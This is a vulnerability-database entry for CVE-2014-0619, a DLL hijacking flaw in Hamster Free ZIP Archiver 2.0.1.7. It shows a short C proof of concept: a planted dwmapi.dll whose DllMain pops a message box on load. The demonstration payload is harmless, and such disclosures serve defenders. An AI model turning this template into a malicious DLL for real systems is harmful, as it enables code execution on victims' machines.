Lucene search
K

Hamster Free ZIP Archiver 2.0.1.7 DLL Hijacking

🗓️ 16 Oct 2014 00:00:00Reported by Osanda MalithType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 31 Views

Hamster Free ZIP Archiver 2.0.1.7 DLL Hijacking Exploit

Related
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2014-0619
23 Oct 201414:00
cve
Cvelist
CVE-2014-0619
23 Oct 201414:00
cvelist
EUVD
EUVD-2014-0650
7 Oct 202500:30
euvd
NVD
CVE-2014-0619
23 Oct 201414:55
nvd
Prion
Design/Logic Flaw
23 Oct 201414:55
prion
`/*  
* Title: Hamster Free ZIP Archiver Dll Hijacking Exploit 2.0.1.7 (dwmapi.dll)  
* Version: 2.0.1.7  
* Tested on: Windows XP SP2 en  
* Vendor: http://www.hamstersoft.com/   
* Software-Link: http://www.hamstersoft.com/online/hfza_site/hfza_site_3_0_0_34_b26122013.exe  
* E-Mail: osanda[at]unseen.is  
* Author: Osanda Malith Jayathissa  
* CVE : CVE-2014-0619  
* /!\ Author is not responsible for any damage you cause  
* Use this material for educational purposes only  
*/   
  
// All extensions are vulnerable  
#include <windows.h>   
  
BOOL WINAPI DllMain (  
HANDLE hinstDLL,  
DWORD fdwReason,  
LPVOID lpvReserved)  
{  
switch (fdwReason)  
{  
case DLL_PROCESS_ATTACH: owned();  
case DLL_THREAD_ATTACH:  
case DLL_THREAD_DETACH:  
case DLL_PROCESS_DETACH:  
break;  
}  
return TRUE;  
}  
  
int owned() {  
MessageBox(0, "Hamster Free ZIP Archiver DLL Hijacked\nOsanda Malith", "POC", MB_OK);  
}  
/*EOF*/  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation